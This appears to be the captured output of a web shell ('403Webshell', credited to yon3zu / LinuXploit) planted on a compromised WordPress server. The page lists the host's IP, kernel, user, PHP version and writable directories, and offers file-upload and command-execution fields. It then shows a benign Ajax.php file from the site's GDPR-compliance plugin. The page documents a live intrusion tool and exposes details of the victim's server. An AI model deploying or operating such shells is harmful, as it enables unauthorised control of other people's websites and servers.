403Webshell
Server IP : 89.248.107.232  /  Your IP : 216.73.217.70
Web Server : Apache
System : Linux host2.kasilh.com 5.14.0-687.36.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 7 05:40:49 EDT 2026 x86_64
User : seg ( 10005)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/seg-sa.es/iticsl.com/wp-content/plugins/wp-gdpr-compliance/WordPress/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhosts/seg-sa.es/iticsl.com/wp-content/plugins/wp-gdpr-compliance/WordPress/Ajax.php
<?php
namespace WPGDPRC\WordPress;

use WPGDPRC\WordPress\Ajax\ConsentCookie;
use WPGDPRC\WordPress\Ajax\DeleteRequest;
use WPGDPRC\WordPress\Ajax\FormSubmitted;
use WPGDPRC\WordPress\Ajax\HideWelcome;
use WPGDPRC\WordPress\Ajax\PostEditLink;
use WPGDPRC\WordPress\Ajax\ProcessAction;
use WPGDPRC\WordPress\Ajax\ProcessRequest;
use WPGDPRC\WordPress\Ajax\ResetConsent;
use WPGDPRC\WordPress\Ajax\UpdateIntegration;
use WPGDPRC\WordPress\Ajax\UpdatePremiumMode;
use WPGDPRC\WordPress\Ajax\UpdateProcessorMode;

/**
 * Class Ajax
 * @package WPGDPRC\WordPress
 */
class Ajax {

	/**
	 * Ajax constructor
	 */
	public static function init() {
		ConsentCookie::init();
		DeleteRequest::init();
		HideWelcome::init();
		PostEditLink::init();
		ProcessAction::init();
		ProcessRequest::init();
		ResetConsent::init();
		UpdateProcessorMode::init();
		UpdateIntegration::init();
		UpdatePremiumMode::init();
        FormSubmitted::init();
	}

}

Youez - 2016 - github.com/yon3zu
LinuXploit